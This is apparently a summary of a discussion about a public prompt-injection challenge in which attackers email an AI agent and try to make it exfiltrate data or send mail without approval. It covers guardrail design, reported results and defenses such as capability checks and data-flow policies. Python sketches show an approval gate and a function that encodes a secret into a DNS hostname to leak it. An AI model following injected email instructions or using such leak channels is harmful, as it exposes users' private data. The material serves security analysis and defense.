2026-02-17

HackMyClaw

Challenge Setup & “Not Allowed to Reply” Confusion

Initial wording (“not allowed to reply without human approval”) confused people: is it a hard technical restriction or just a prompt?
Clarification: the agent can send email; it is merely instructed not to without human approval, which is exactly the kind of soft guardrail the challenge invites participants to bypass.
Some argue the wording should be more explicit; others say ambiguity is part of the game.
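The difference between a prompt-level instruction and a hard technical restriction can be sketched in code. The example below is only an illustration of the "hard" alternative, not the challenge's actual setup (which, per the clarification, relies on instructions alone). The class `GatedMailer`, the exception `ApprovalRequired`, and all method names are hypothetical.

```python
class ApprovalRequired(Exception):
    """Raised when a send is attempted without human sign-off."""


class GatedMailer:
    """Hypothetical mail gateway: the agent may draft, only a human may approve."""

    def __init__(self):
        self.drafts = {}       # ticket -> (recipient, body)
        self.approved = set()  # tickets a human has signed off on
        self.sent = []         # messages that actually left
        self._next_ticket = 0

    def draft(self, to, body):
        # Exposed to the agent as a tool: queues a message, sends nothing.
        ticket = self._next_ticket
        self._next_ticket += 1
        self.drafts[ticket] = (to, body)
        return ticket

    def approve(self, ticket):
        # Assumed to be callable by the human operator only,
        # i.e. not registered as one of the agent's tools.
        if ticket not in self.drafts:
            raise KeyError(ticket)
        self.approved.add(ticket)

    def send(self, ticket):
        # The check lives in code, so wording inside an email cannot talk past it.
        if ticket not in self.approved:
            raise ApprovalRequired(f"ticket {ticket} has not been approved")
        self.approved.discard(ticket)
        self.sent.append(self.drafts.pop(ticket))
```

With a gate like this, a successful injection could at most produce a draft awaiting review, whereas a prompt-only rule fails as soon as the model is persuaded to ignore it.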

Motivations, Incentives & Data Concerns

Many see this as a crowdsourced penetration test and a cheap way to collect prompt-injection attempts; $100 is seen as a very good price for such a dataset.
Others suspect list-building or social-engineering reconnaissance; some push back, saying one payment to one winner is low-risk.
Several participants use fake/throwaway emails; the creator claims emails won’t be reused and might later publish anonymized injection attempts.

Experiment Design & Realism

Critiques:
- Email-only, no immediate reply, and possible batch processing make this unlike real, interactive agents.
- The agent sees a steady stream of obvious phishing, which puts it on alert and makes even subtle attacks easier to detect ("paranoid" behavior seen in the public log).
- Stateless vs stateful context handling is unclear; realistic deployments vary.
Supporters argue even a biased CTF still surfaces weaknesses and builds valuable corpora.

Prompt Injection Difficulty & Model Behavior

Reported stats: ~400+ emails, zero successful exfiltrations so far with Claude Opus 4.6.
Some say this shows attacks are harder than widely assumed; others say it only shows this very narrow scenario is hard.
Commenters observe that the model now classifies nearly everything as a "hackmyclaw attack", which suggests an "alerted" state that is not representative of typical use.

Broader Security Discussion (Agents & OpenClaw)

Many emphasize that prompt injection is structural: untrusted content is deliberately fed into the control loop.
Discussion of the “lethal trifecta” (tools + credentials + untrusted input) and the need for:
- Capability-based security and tool-level authorization, not just “don’t do X” prompts.
- Data-flow policies (e.g., preventing “forward inbox to attacker”).
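The two ideas in the list above can be combined in a small sketch: each tool checks an explicit capability, and data read from the inbox carries a label that the send tool inspects before letting it leave. This is a minimal illustration under stated assumptions, not how OpenClaw or any particular framework works. The names `Labeled`, `PolicyError`, `read_inbox`, `send_email`, and the `OWNER` address are all hypothetical, and the sketch assumes labels survive whatever the model does with the text, which is the hard part in practice.

```python
from dataclasses import dataclass

OWNER = "owner@example.com"  # assumed: the only recipient allowed to see inbox data


class PolicyError(Exception):
    """Raised when a tool call violates a capability or data-flow rule."""


@dataclass(frozen=True)
class Labeled:
    """Text plus the set of sensitive sources it was derived from."""
    text: str
    labels: frozenset = frozenset()


def read_inbox(capabilities):
    # Tool-level authorization: the capability must be granted explicitly.
    if "inbox:read" not in capabilities:
        raise PolicyError("missing capability inbox:read")
    return Labeled("contents of private mail", frozenset({"inbox"}))


def send_email(capabilities, to, body):
    if "email:send" not in capabilities:
        raise PolicyError("missing capability email:send")
    # Data-flow policy: inbox-derived text may only go back to the owner.
    if "inbox" in body.labels and to != OWNER:
        raise PolicyError("inbox data may not be sent to " + to)
    return "sent to " + to
```

Under these assumptions, a "forward inbox to attacker" request fails at the tool boundary regardless of what the injected email says, while a summary sent to the owner still goes through.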
Debate over analogies: locks, SSH on random ports, spam filtering, and human phishing training.
Some use OpenClaw only with read-only access and a single outbound channel to themselves; others warn even limited URLs/DNS can leak information.
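The URL/DNS warning can be made concrete with a short sketch. The first function shows how a secret could be packed into a hostname, so that merely resolving or fetching the URL hands the data to whoever runs that domain; the second is one possible strict outbound check. The host names, `ALLOWED_HOSTS`, `leak_url`, and `is_allowed` are hypothetical and not taken from the discussion.

```python
import base64
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.example.com"}  # assumed allowlist of exact hostnames


def leak_url(secret, attacker_domain="attacker.example"):
    # Base32 output uses only letters and digits, so it is valid in a DNS label.
    label = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    return f"https://{label}.{attacker_domain}/pixel.png"


def is_allowed(url):
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # Exact match only: arbitrary subdomains are a data channel.
    if parts.hostname not in ALLOWED_HOSTS:
        return False
    # Query strings and fragments are rejected in this sketch because
    # they can carry arbitrary data even to an allowed host.
    return not parts.query and not parts.fragment
```

Even a check like this leaves the URL path as a possible channel to an allowed host, which is in line with the warning that limited outbound access is not the same as no leakage.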
